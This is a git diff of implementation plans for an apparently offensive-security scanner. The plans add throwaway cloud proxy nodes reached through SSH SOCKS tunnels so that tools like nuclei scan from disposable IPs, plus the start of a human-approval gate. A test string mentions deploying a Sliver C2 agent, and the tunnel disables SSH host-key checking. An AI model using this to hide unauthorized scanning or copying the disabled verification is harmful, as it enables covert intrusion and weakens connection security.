+        resp = await self._client.get(f"/droplets/{provider_id}")
+        resp.raise_for_status()
+        droplet = resp.json()["droplet"]
+        status = "active" if droplet["status"] == "active" else "creating"
+        ip = None
+        for net in droplet.get("networks", {}).get("v4", []):
+            if net.get("type") == "public":
+                ip = net["ip_address"]
+                break
+        return status, ip
+
+    async def destroy_node(self, provider_id: str) -> None:
+        resp = await self._client.delete(f"/droplets/{provider_id}")
+        if resp.status_code not in (204, 404):
+            resp.raise_for_status()
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_provider.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/infra/__init__.py packages/cli/src/opentools/scanner/infra/provider.py packages/cli/src/opentools/scanner/infra/digitalocean.py packages/cli/tests/test_scanner/test_infra_provider.py
+git commit -m "feat(infra): add CloudNodeProvider ABC with DigitalOcean implementation"
+```
+
+---
+
+### Task 7: Ephemeral Proxy Context Manager + Shielded Teardown
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/infra/proxy.py`
+- Test: `packages/cli/tests/test_scanner/test_infra_proxy.py`
+
+**Context:** This is the critical piece — the `AsyncContextManager` that composes provision → tunnel → teardown with guaranteed cleanup. The `_shielded_destroy` pattern ensures the cloud API DELETE fires even when the parent task is cancelled.
+
+- [ ] **Step 1: Write failing tests for proxy lifecycle**
+
+```python
+# packages/cli/tests/test_scanner/test_infra_proxy.py
+"""Tests for ephemeral_proxy context manager and shielded teardown."""
+
+import asyncio
+
+import pytest
+
+from opentools.scanner.infra.provider import (
+    CloudNodeProvider,
+    ProvisioningError,
+)
+from opentools.scanner.infra.proxy import (
+    ProxyEndpoint,
+    _shielded_destroy,
+    ephemeral_proxy,
+)
+
+
+class FakeProvider(CloudNodeProvider):
+    """In-memory provider for testing. No real cloud calls."""
+
+    def __init__(
+        self,
+        ready_after_polls: int = 1,
+        ip_address: str = "1.2.3.4",
+        fail_create: bool = False,
+        fail_destroy: bool = False,
+    ):
+        self.ready_after_polls = ready_after_polls
+        self.ip_address = ip_address
+        self.fail_create = fail_create
+        self.fail_destroy = fail_destroy
+        self.created_ids: list[str] = []
+        self.destroyed_ids: list[str] = []
+        self._poll_count = 0
+
+    async def create_node(self, region, ssh_public_key, tags):
+        if self.fail_create:
+            raise ProvisioningError("create failed")
+        node_id = f"fake-{len(self.created_ids)}"
+        self.created_ids.append(node_id)
+        return node_id
+
+    async def poll_status(self, provider_id):
+        self._poll_count += 1
+        if self._poll_count >= self.ready_after_polls:
+            return "active", self.ip_address
+        return "creating", None
+
+    async def destroy_node(self, provider_id):
+        if self.fail_destroy:
+            raise ProvisioningError("destroy failed")
+        self.destroyed_ids.append(provider_id)
+
+
+class TestShieldedDestroy:
+    @pytest.mark.asyncio
+    async def test_normal_destroy(self):
+        provider = FakeProvider()
+        provider.created_ids.append("node-1")
+        await _shielded_destroy(provider, "node-1")
+        assert "node-1" in provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_destroy_survives_cancellation(self):
+        """The destroy call completes even when the outer scope is cancelled."""
+        provider = FakeProvider()
+        provider.created_ids.append("node-1")
+        destroyed = False
+
+        async def destroy_with_delay():
+            """Simulate a destroy that takes some time."""
+            await asyncio.sleep(0.05)
+            await _shielded_destroy(provider, "node-1")
+            nonlocal destroyed
+            destroyed = True
+
+        task = asyncio.ensure_future(destroy_with_delay())
+        await asyncio.sleep(0.01)
+        task.cancel()
+        try:
+            await task
+        except asyncio.CancelledError:
+            pass
+
+        # Give the shielded destroy time to complete
+        await asyncio.sleep(0.1)
+        assert "node-1" in provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_destroy_failure_does_not_raise(self):
+        """Destroy errors are logged, not raised — we can't do more."""
+        provider = FakeProvider(fail_destroy=True)
+        # Should not raise
+        await _shielded_destroy(provider, "node-1")
+
+
+class TestProxyEndpoint:
+    def test_env_includes_proxy_vars(self):
+        endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800)
+        env = endpoint.env
+        assert "socks5://127.0.0.1:10800" in env["HTTP_PROXY"]
+        assert "socks5://127.0.0.1:10800" in env["HTTPS_PROXY"]
+        assert "socks5://127.0.0.1:10800" in env["ALL_PROXY"]
+        # Both upper and lower case for tool compatibility
+        assert "socks5://127.0.0.1:10800" in env["http_proxy"]
+        assert "socks5://127.0.0.1:10800" in env["https_proxy"]
+
+    def test_env_inherits_parent_env(self):
+        """Proxy env vars are merged with parent environment."""
+        import os
+        endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800)
+        env = endpoint.env
+        assert "PATH" in env or "Path" in env  # platform-dependent casing
+
+
+class TestEphemeralProxyLifecycle:
+    @pytest.mark.asyncio
+    async def test_provision_and_teardown(self):
+        """Happy path: provision → yield endpoint → destroy."""
+        provider = FakeProvider(ready_after_polls=1)
+
+        async with ephemeral_proxy(
+            provider=provider,
+            region="nyc3",
+            ssh_key="test-key",
+            local_socks_port=10800,
+            scan_id="scan-1",
+            _skip_tunnel=True,  # skip real SSH for unit test
+        ) as endpoint:
+            assert isinstance(endpoint, ProxyEndpoint)
+            assert endpoint.host == "1.2.3.4"
+            assert endpoint.socks_port == 10800
+
+        # After exit, node must be destroyed
+        assert len(provider.created_ids) == 1
+        assert len(provider.destroyed_ids) == 1
+        assert provider.created_ids[0] == provider.destroyed_ids[0]
+
+    @pytest.mark.asyncio
+    async def test_teardown_on_exception(self):
+        """Node is destroyed even if the body raises."""
+        provider = FakeProvider(ready_after_polls=1)
+
+        with pytest.raises(ValueError, match="deliberate"):
+            async with ephemeral_proxy(
+                provider=provider, region="nyc3", ssh_key="k",
+                local_socks_port=10800, scan_id="s1",
+                _skip_tunnel=True,
+            ):
+                raise ValueError("deliberate")
+
+        assert len(provider.destroyed_ids) == 1
+
+    @pytest.mark.asyncio
+    async def test_create_failure_no_destroy(self):
+        """If creation fails, no destroy is attempted (nothing to destroy)."""
+        provider = FakeProvider(fail_create=True)
+
+        with pytest.raises(ProvisioningError):
+            async with ephemeral_proxy(
+                provider=provider, region="nyc3", ssh_key="k",
+                local_socks_port=10800, scan_id="s1",
+                _skip_tunnel=True,
+            ):
+                pass  # pragma: no cover
+
+        assert provider.destroyed_ids == []
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_proxy.py::TestProxyEndpoint -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement ephemeral_proxy, ProxyEndpoint, _shielded_destroy**
+
+```python
+# packages/cli/src/opentools/scanner/infra/proxy.py
+"""Ephemeral proxy context manager with guaranteed teardown.
+
+Usage::
+
+    async with ephemeral_proxy(provider, region="nyc3", ...) as endpoint:
+        result = await run_streaming(args, on_output, env=endpoint.env)
+    # Node is destroyed here, guaranteed.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import logging
+import os
+from contextlib import asynccontextmanager
+from typing import AsyncIterator
+
+from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError
+
+logger = logging.getLogger(__name__)
+
+PROXY_TAG = "opentools-ephemeral-proxy"
+
+
+class ProxyEndpoint:
+    """The usable result of a provisioned proxy — env vars for subprocess injection."""
+
+    def __init__(self, host: str, socks_port: int) -> None:
+        self.host = host
+        self.socks_port = socks_port
+
+    @property
+    def env(self) -> dict[str, str]:
+        """Environment dict with proxy vars merged into parent env."""
+        proxy_url = f"socks5://127.0.0.1:{self.socks_port}"
+        return {
+            **os.environ,
+            "HTTP_PROXY": proxy_url,
+            "HTTPS_PROXY": proxy_url,
+            "http_proxy": proxy_url,
+            "https_proxy": proxy_url,
+            "ALL_PROXY": proxy_url,
+        }
+
+
+@asynccontextmanager
+async def ephemeral_proxy(
+    provider: CloudNodeProvider,
+    region: str = "nyc3",
+    ssh_key: str = "",
+    ssh_key_path: str = "~/.ssh/id_ed25519",
+    local_socks_port: int = 10800,
+    scan_id: str = "",
+    _skip_tunnel: bool = False,
+) -> AsyncIterator[ProxyEndpoint]:
+    """Provision ephemeral proxy, optionally establish tunnel, yield endpoint.
+
+    GUARANTEE: The cloud node is destroyed on exit regardless of how the
+    body terminates — normal return, exception, timeout, or cancellation.
+    The destroy call is shielded from asyncio.CancelledError.
+
+    Args:
+        _skip_tunnel: If True, skip SSH tunnel setup (for unit testing).
+    """
+    tags = [PROXY_TAG, f"scan:{scan_id}"]
+    provider_id: str | None = None
+    tunnel_proc: asyncio.subprocess.Process | None = None
+
+    try:
+        # Phase 1: Provision
+        provider_id = await provider.create_node(
+            region=region, ssh_public_key=ssh_key, tags=tags,
+        )
+        logger.info("Provisioning node %s in %s", provider_id, region)
+
+        ip_address = await provider.wait_until_ready(provider_id)
+
+        # Phase 2: SSH tunnel (skippable for testing)
+        if not _skip_tunnel:
+            tunnel_proc = await _establish_tunnel(
+                ip_address=ip_address,
+                ssh_key_path=ssh_key_path,
+                local_port=local_socks_port,
+            )
+
+        endpoint = ProxyEndpoint(host=ip_address, socks_port=local_socks_port)
+        logger.info(
+            "Proxy ready: 127.0.0.1:%d → %s (node %s)",
+            local_socks_port, ip_address, provider_id,
+        )
+
+        yield endpoint
+
+    finally:
+        # Phase 3: Teardown (reverse order)
+
+        # 3a. Kill SSH tunnel
+        if tunnel_proc is not None and tunnel_proc.returncode is None:
+            tunnel_proc.terminate()
+            try:
+                await asyncio.wait_for(tunnel_proc.wait(), timeout=5.0)
+            except asyncio.TimeoutError:
+                tunnel_proc.kill()
+                await tunnel_proc.wait()
+            logger.info("SSH tunnel terminated")
+
+        # 3b. Destroy cloud node (shielded from cancellation)
+        if provider_id is not None:
+            await _shielded_destroy(provider, provider_id)
+
+
+async def _shielded_destroy(provider: CloudNodeProvider, provider_id: str) -> None:
+    """Destroy a cloud node, shielded from asyncio.CancelledError.
+
+    Pattern: create a concrete Task, shield it, and if CancelledError fires
+    in our scope, await the task directly (it's still running unaffected).
+    """
+    destroy_task = asyncio.ensure_future(provider.destroy_node(provider_id))
+    try:
+        await asyncio.shield(destroy_task)
+        logger.info("Node %s destroyed", provider_id)
+    except asyncio.CancelledError:
+        try:
+            await destroy_task
+            logger.info("Node %s destroyed (post-cancellation)", provider_id)
+        except Exception:
+            logger.exception("Failed to destroy node %s during cancellation", provider_id)
+        raise
+    except Exception:
+        logger.exception("Failed to destroy node %s", provider_id)
+
+
+async def _establish_tunnel(
+    ip_address: str,
+    ssh_key_path: str,
+    local_port: int,
+    max_retries: int = 5,
+    retry_delay: float = 3.0,
+) -> asyncio.subprocess.Process:
+    """Start SSH dynamic SOCKS5 tunnel with retry for sshd startup race."""
+    expanded_key = os.path.expanduser(ssh_key_path)
+
+    for attempt in range(max_retries):
+        proc = await asyncio.create_subprocess_exec(
+            "ssh",
+            "-D", str(local_port),
+            "-N",
+            "-o", "StrictHostKeyChecking=no",
+            "-o", "UserKnownHostsFile=/dev/null",
+            "-o", "ConnectTimeout=10",
+            "-o", "ServerAliveInterval=15",
+            "-o", "ServerAliveCountMax=3",
+            "-o", "ExitOnForwardFailure=yes",
+            "-i", expanded_key,
+            f"root@{ip_address}",
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+        )
+        await asyncio.sleep(2.0)
+        if proc.returncode is None:
+            return proc
+
+        stderr = b""
+        if proc.stderr:
+            stderr = await proc.stderr.read()
+        if attempt < max_retries - 1:
+            logger.debug(
+                "SSH attempt %d failed: %s — retrying",
+                attempt + 1, stderr.decode(errors="replace").strip(),
+            )
+            await asyncio.sleep(retry_delay)
+            continue
+
+        raise ProvisioningError(
+            f"SSH tunnel failed after {max_retries} attempts: {stderr.decode(errors='replace')}"
+        )
+
+    raise ProvisioningError("SSH tunnel failed: exhausted retries")
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_proxy.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/infra/proxy.py packages/cli/tests/test_scanner/test_infra_proxy.py
+git commit -m "feat(infra): ephemeral_proxy context manager with shielded teardown"
+```
+
+---
+
+### Task 8: ProxiedShellExecutor
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/executor/proxied_shell.py`
+- Modify: `packages/cli/src/opentools/scanner/executor/__init__.py`
+- Test: `packages/cli/tests/test_scanner/test_executor_proxied_shell.py`
+
+**Context:** Wraps the existing shell execution path. Tasks opt in to proxying via `task.isolation == TaskIsolation.NETWORK_ISOLATED`. Non-proxied tasks fall through to a plain `run_streaming` call identical to `ShellExecutor`.
+
+- [ ] **Step 1: Write failing tests**
+
+```python
+# packages/cli/tests/test_scanner/test_executor_proxied_shell.py
+"""Tests for ProxiedShellExecutor."""
+
+import sys
+
+import pytest
+
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor
+from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError
+from opentools.scanner.models import ScanTask, TaskIsolation, TaskType
+
+
+class FakeProvider(CloudNodeProvider):
+    def __init__(self):
+        self.created = []
+        self.destroyed = []
+        self._poll_count = 0
+
+    async def create_node(self, region, ssh_public_key, tags):
+        self.created.append(region)
+        return "fake-node"
+
+    async def poll_status(self, provider_id):
+        self._poll_count += 1
+        return "active", "1.2.3.4"
+
+    async def destroy_node(self, provider_id):
+        self.destroyed.append(provider_id)
+
+
+def _make_task(
+    task_id: str = "t1",
+    command: str = f"{sys.executable} -c \"print('hello')\"",
+    isolation: TaskIsolation = TaskIsolation.NONE,
+    tool: str = "nuclei",
+) -> ScanTask:
+    return ScanTask(
+        id=task_id, scan_id="scan-1", name="test",
+        tool=tool, task_type=TaskType.SHELL,
+        command=command, isolation=isolation,
+    )
+
+
+class TestProxiedShellExecutor:
+    @pytest.mark.asyncio
+    async def test_non_proxied_task_runs_directly(self):
+        """Tasks without NETWORK_ISOLATED run as plain subprocess."""
+        executor = ProxiedShellExecutor(provider=None)
+        task = _make_task(isolation=TaskIsolation.NONE)
+        cancel = CancellationToken()
+        result = await executor.execute(task, lambda _: None, cancel)
+        assert result.exit_code == 0
+        assert "hello" in result.stdout
+
+    @pytest.mark.asyncio
+    async def test_no_provider_falls_through(self):
+        """NETWORK_ISOLATED task with no provider configured runs directly."""
+        executor = ProxiedShellExecutor(provider=None)
+        task = _make_task(isolation=TaskIsolation.NETWORK_ISOLATED)
+        cancel = CancellationToken()
+        result = await executor.execute(task, lambda _: None, cancel)
+        assert result.exit_code == 0
+
+    @pytest.mark.asyncio
+    async def test_proxied_task_provisions_and_destroys(self):
+        """NETWORK_ISOLATED task with provider triggers full lifecycle."""
+        provider = FakeProvider()
+        executor = ProxiedShellExecutor(
+            provider=provider, ssh_key="k", ssh_key_path="/dev/null",
+            _skip_tunnel=True,
+        )
+        task = _make_task(isolation=TaskIsolation.NETWORK_ISOLATED)
+        cancel = CancellationToken()
+        result = await executor.execute(task, lambda _: None, cancel)
+        assert result.exit_code == 0
+        assert len(provider.created) == 1
+        assert len(provider.destroyed) == 1
+
+    @pytest.mark.asyncio
+    async def test_missing_command_raises(self):
+        executor = ProxiedShellExecutor(provider=None)
+        task = ScanTask(
+            id="t1", scan_id="s1", name="no-cmd",
+            tool="test", task_type=TaskType.SHELL,
+        )
+        cancel = CancellationToken()
+        with pytest.raises(ValueError, match="no command"):
+            await executor.execute(task, lambda _: None, cancel)
+
+    @pytest.mark.asyncio
+    async def test_socks_port_increments(self):
+        """Each proxied task gets a unique SOCKS port."""
+        executor = ProxiedShellExecutor(
+            provider=FakeProvider(), ssh_key="k",
+            base_socks_port=10800, _skip_tunnel=True,
+        )
+        assert executor._next_socks_port() == 10800
+        assert executor._next_socks_port() == 10801
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_proxied_shell.py::TestProxiedShellExecutor::test_non_proxied_task_runs_directly -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement ProxiedShellExecutor**
+
+```python
+# packages/cli/src/opentools/scanner/executor/proxied_shell.py
+"""ProxiedShellExecutor — optionally routes tool traffic through ephemeral proxy."""
+
+from __future__ import annotations
+
+import shlex
+from typing import Callable
+
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.infra.provider import CloudNodeProvider
+from opentools.scanner.infra.proxy import ephemeral_proxy
+from opentools.scanner.models import ScanTask, TaskIsolation
+from opentools.shared.subprocess import run_streaming
+
+
+class ProxiedShellExecutor:
+    """Shell executor with optional ephemeral proxy routing.
+
+    Tasks with ``isolation == TaskIsolation.NETWORK_ISOLATED`` are routed
+    through an ephemeral SOCKS5 proxy.  All other tasks run as plain
+    subprocesses, identical to ShellExecutor.
+    """
+
+    def __init__(
+        self,
+        provider: CloudNodeProvider | None,
+        ssh_key: str = "",
+        ssh_key_path: str = "~/.ssh/id_ed25519",
+        default_timeout: int = 300,
+        base_socks_port: int = 10800,
+        _skip_tunnel: bool = False,
+    ) -> None:
+        self._provider = provider
+        self._ssh_key = ssh_key
+        self._ssh_key_path = ssh_key_path
+        self._default_timeout = default_timeout
+        self._base_socks_port = base_socks_port
+        self._port_counter = 0
+        self._skip_tunnel = _skip_tunnel
+
+    def _next_socks_port(self) -> int:
+        port = self._base_socks_port + self._port_counter
+        self._port_counter += 1
+        return port
+
+    async def execute(
+        self,
+        task: ScanTask,
+        on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        if task.command is None:
+            raise ValueError(f"Task {task.id} has no command")
+
+        needs_proxy = (
+            self._provider is not None
+            and task.isolation == TaskIsolation.NETWORK_ISOLATED
+        )
+
+        if not needs_proxy:
+            return await self._run_direct(task, on_output, cancellation)
+
+        return await self._run_proxied(task, on_output, cancellation)
+
+    async def _run_direct(
+        self, task: ScanTask, on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        args = shlex.split(task.command)
+        result = await run_streaming(
+            args=args, on_output=on_output,
+            timeout=self._default_timeout, cancellation=cancellation,
+        )
+        return TaskOutput(
+            exit_code=result.exit_code, stdout=result.stdout,
+            stderr=result.stderr, duration_ms=result.duration_ms,
+        )
+
+    async def _run_proxied(
+        self, task: ScanTask, on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        socks_port = self._next_socks_port()
+
+        async with ephemeral_proxy(
+            provider=self._provider,
+            region="nyc3",
+            ssh_key=self._ssh_key,
+            ssh_key_path=self._ssh_key_path,
+            local_socks_port=socks_port,
+            scan_id=task.scan_id,
+            _skip_tunnel=self._skip_tunnel,
+        ) as proxy:
+            args = shlex.split(task.command)
+            result = await run_streaming(
+                args=args, on_output=on_output,
+                timeout=self._default_timeout, cancellation=cancellation,
+                env=proxy.env,
+            )
+
+        return TaskOutput(
+            exit_code=result.exit_code, stdout=result.stdout,
+            stderr=result.stderr, duration_ms=result.duration_ms,
+        )
+```
+
+- [ ] **Step 4: Update executor __init__.py exports**
+
+In `packages/cli/src/opentools/scanner/executor/__init__.py`, add:
+
+```python
+from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor
+```
+
+And add `"ProxiedShellExecutor"` to the `__all__` list.
+
+- [ ] **Step 5: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_proxied_shell.py -v`
+Expected: All PASS
+
+- [ ] **Step 6: Run all executor tests for regression check**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_shell.py tests/test_scanner/test_executor_docker.py -v`
+Expected: All PASS
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/executor/proxied_shell.py packages/cli/src/opentools/scanner/executor/__init__.py packages/cli/tests/test_scanner/test_executor_proxied_shell.py
+git commit -m "feat(executor): add ProxiedShellExecutor with ephemeral proxy routing"
+```
+
+---
+
+### Task 9: Orphan Sweeper + Final Integration
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/infra/sweeper.py`
+- Test: `packages/cli/tests/test_scanner/test_infra_sweeper.py` (inline below)
+
+- [ ] **Step 1: Write failing tests for sweep_orphaned_nodes**
+
+```python
+# packages/cli/tests/test_scanner/test_infra_sweeper.py
+"""Tests for orphan node sweeper."""
+
+import pytest
+
+from opentools.scanner.infra.sweeper import sweep_orphaned_nodes
+
+
+class FakeListableProvider:
+    """Provider that also supports listing nodes by tag."""
+    def __init__(self, orphan_ids: list[str]):
+        self._orphan_ids = orphan_ids
+        self.destroyed_ids: list[str] = []
+
+    async def list_nodes_by_tag(self, tag: str) -> list[str]:
+        return list(self._orphan_ids)
+
+    async def destroy_node(self, provider_id: str) -> None:
+        self.destroyed_ids.append(provider_id)
+
+
+class TestSweepOrphanedNodes:
+    @pytest.mark.asyncio
+    async def test_destroys_orphans(self):
+        provider = FakeListableProvider(orphan_ids=["orphan-1", "orphan-2"])
+        count = await sweep_orphaned_nodes(provider)
+        assert count == 2
+        assert set(provider.destroyed_ids) == {"orphan-1", "orphan-2"}
+
+    @pytest.mark.asyncio
+    async def test_no_orphans(self):
+        provider = FakeListableProvider(orphan_ids=[])
+        count = await sweep_orphaned_nodes(provider)
+        assert count == 0
+        assert provider.destroyed_ids == []
+
+    @pytest.mark.asyncio
+    async def test_destroy_failure_continues(self):
+        """One destroy failure should not stop cleanup of remaining nodes."""
+        class PartialFailProvider(FakeListableProvider):
+            async def destroy_node(self, provider_id):
+                if provider_id == "orphan-1":
+                    raise Exception("API error")
+                self.destroyed_ids.append(provider_id)
+
+        provider = PartialFailProvider(orphan_ids=["orphan-1", "orphan-2"])
+        count = await sweep_orphaned_nodes(provider)
+        # orphan-2 was destroyed, orphan-1 failed
+        assert count == 1
+        assert "orphan-2" in provider.destroyed_ids
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_sweeper.py -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement sweep_orphaned_nodes**
+
+```python
+# packages/cli/src/opentools/scanner/infra/sweeper.py
+"""Startup sweeper for orphaned ephemeral proxy nodes.
+
+Call sweep_orphaned_nodes() during ScanEngine initialization to clean
+up nodes from crashed previous runs. Uses the PROXY_TAG to identify
+resources that belong to OpenTools.
+"""
+
+from __future__ import annotations
+
+import logging
+
+from opentools.scanner.infra.proxy import PROXY_TAG
+
+logger = logging.getLogger(__name__)
+
+
+async def sweep_orphaned_nodes(provider: object) -> int:
+    """Destroy any nodes tagged with PROXY_TAG from previous runs.
+
+    The provider must implement ``list_nodes_by_tag(tag) -> list[str]``
+    and ``destroy_node(provider_id)``.
+
+    Returns the number of nodes successfully destroyed.
+    """
+    if not hasattr(provider, "list_nodes_by_tag"):
+        logger.debug("Provider does not support list_nodes_by_tag, skipping sweep")
+        return 0
+
+    orphan_ids = await provider.list_nodes_by_tag(PROXY_TAG)
+    if not orphan_ids:
+        return 0
+
+    logger.info("Found %d orphaned proxy nodes to sweep", len(orphan_ids))
+    destroyed = 0
+
+    for node_id in orphan_ids:
+        try:
+            await provider.destroy_node(node_id)
+            destroyed += 1
+            logger.info("Destroyed orphaned node %s", node_id)
+        except Exception:
+            logger.exception("Failed to destroy orphaned node %s", node_id)
+
+    return destroyed
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_sweeper.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Run the full test suite for both phases**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py tests/test_scanner/test_mutation_analyzer.py tests/test_scanner/test_mutation_strategy.py tests/test_scanner/test_engine_mutation.py tests/test_scanner/test_engine.py tests/test_scanner/test_shared_subprocess.py tests/test_scanner/test_infra_provider.py tests/test_scanner/test_infra_proxy.py tests/test_scanner/test_executor_proxied_shell.py tests/test_scanner/test_infra_sweeper.py -v`
+Expected: All PASS
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/infra/sweeper.py packages/cli/tests/test_scanner/test_infra_sweeper.py
+git commit -m "feat(infra): add orphan node sweeper for startup cleanup"
+```
+
+---
+
+## Appendix: Concurrency Safety Proof
+
+The mutation layer introduces zero new concurrency hazards. Here is the execution trace through a single event loop turn:
+
+```
+await asyncio.wait(in_flight, FIRST_COMPLETED)          # ← yield point
+│
+├─ for completed_future in done:                         # synchronous
+│   ├─ _mark_completed(task_id, output)                  # synchronous
+│   │   ├─ analyzer.analyze(stdout, stderr)              # synchronous (XML/JSON parse)
+│   │   ├─ kill_chain.ingest(bundle)                     # synchronous (dict mutation)
+│   │   ├─ strategy.evaluate(state, scan_id, task)       # synchronous
+│   │   ├─ _evaluate_edges(task, output)                 # synchronous (existing)
+│   │   └─ _inject_tasks(new_tasks)                      # synchronous (dict mutation)
+│   └─ (next completed_future)
+│
+├─ ready_tasks_by_priority()                             # sees injected tasks
+├─ dispatch → asyncio.ensure_future(...)                 # schedules, no yield
+└─ await asyncio.wait(...)                               # ← next yield point
+```
+
+No `await` between state mutation and the next readiness check. The asyncio event loop cannot context-switch during this chain.
diff --git a/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md b/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md
new file mode 100644
index 0000000..fe7664c
--- /dev/null
+++ b/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md
@@ -0,0 +1,1384 @@
+# HITL Approval Gate + Vultr Provider Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Add a durable Human-In-The-Loop approval gate to the DAG execution engine and a Vultr cloud provider for ephemeral proxy routing.
+
+**Architecture:** The approval gate is an execution wrapper — not a separate TaskType — that inserts a sleep-until-approved phase into `_execute_task` before the real executor fires. Persistence is SQLite-first: the FastAPI route writes decisions to the database before signaling the in-memory `asyncio.Event`. The Vultr provider implements the existing `CloudNodeProvider` ABC with explicit SSH key injection for automated tunnel bootstrapping.
+
+**Tech Stack:** Python 3.12+, Pydantic v2, asyncio, httpx, aiosqlite, FastAPI, pytest + pytest-asyncio
+
+**Spec:** [2026-04-13-hitl-approval-gate-vultr-provider-design.md](../specs/2026-04-13-hitl-approval-gate-vultr-provider-design.md)
+
+**Depends on:** [2026-04-13-dag-mutation-ephemeral-proxy.md](2026-04-13-dag-mutation-ephemeral-proxy.md) (Phase A Tasks 1-4 and Phase B Task 6)
+
+---
+
+## File Structure
+
+### Phase C — HITL Approval Gate
+
+| Action | Path | Responsibility |
+|--------|------|----------------|
+| Modify | `packages/cli/src/opentools/scanner/models.py:54-60,201-231` | Add `AWAITING_APPROVAL` to `TaskStatus`, `ApprovalRequirement` model, new fields on `ScanTask` |
+| Create | `packages/cli/src/opentools/scanner/approval.py` | `ApprovalRegistry` singleton |
+| Modify | `packages/cli/src/opentools/scanner/engine.py:215-251` | Insert gate phase into `_execute_task` |
+| Modify | `packages/web/backend/app/models.py:252-284` | Add approval columns to `ScanTaskRecord` |
+| Modify | `packages/web/backend/app/routes/scans.py` | Add gate list/approve/reject endpoints |
+| Create | `packages/cli/tests/test_scanner/test_approval_registry.py` | Tests for ApprovalRegistry |
+| Create | `packages/cli/tests/test_scanner/test_engine_approval.py` | Integration tests for gate in engine |
+| Create | `packages/web/backend/tests/test_gate_routes.py` | Tests for FastAPI gate endpoints |
+
+### Task 6b — Vultr Provider
+
+| Action | Path | Responsibility |
+|--------|------|----------------|
+| Create | `packages/cli/src/opentools/scanner/infra/vultr.py` | `VultrProvider` implementation |
+| Create | `packages/cli/tests/test_scanner/test_infra_vultr.py` | Tests with httpx MockTransport |
+
+---
+
+## Phase C: HITL Approval Gate
+
+### Task 10: Model Additions — ApprovalRequirement, TaskStatus, ScanTask Fields
+
+**Files:**
+- Modify: `packages/cli/src/opentools/scanner/models.py:54-60` (TaskStatus enum)
+- Modify: `packages/cli/src/opentools/scanner/models.py:188-231` (new model + ScanTask fields)
+- Test: `packages/cli/tests/test_scanner/test_mutation_models.py` (append)
+
+- [ ] **Step 1: Write failing tests for ApprovalRequirement and new ScanTask fields**
+
+```python
+# Append to packages/cli/tests/test_scanner/test_mutation_models.py
+# OR create packages/cli/tests/test_scanner/test_approval_models.py
+
+from opentools.scanner.models import (
+    ApprovalRequirement,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+)
+
+
+class TestApprovalRequirement:
+    def test_defaults(self):
+        req = ApprovalRequirement()
+        assert req.timeout_seconds == 3600
+        assert req.description == ""
+
+    def test_custom_values(self):
+        req = ApprovalRequirement(
+            timeout_seconds=600,
+            description="Deploy Sliver agent on 10.0.0.1",
+        )
+        assert req.timeout_seconds == 600
+        assert req.description == "Deploy Sliver agent on 10.0.0.1"
+
+
+class TestTaskStatusApproval:
+    def test_awaiting_approval_value(self):
+        assert TaskStatus.AWAITING_APPROVAL == "awaiting_approval"
+
+    def test_awaiting_approval_in_enum(self):
+        assert "awaiting_approval" in [s.value for s in TaskStatus]
+
+
+class TestScanTaskApprovalFields:
+    def test_requires_approval_default_none(self):
+        task = ScanTask(
+            id="t1", scan_id="s1", name="test",
+            tool="nmap", task_type=TaskType.SHELL,
+        )
+        assert task.requires_approval is None
+        assert task.approval_ticket_id is None
+        assert task.approval_expires_at is None
+
+    def test_requires_approval_set(self):
+        req = ApprovalRequirement(
+            timeout_seconds=1800,
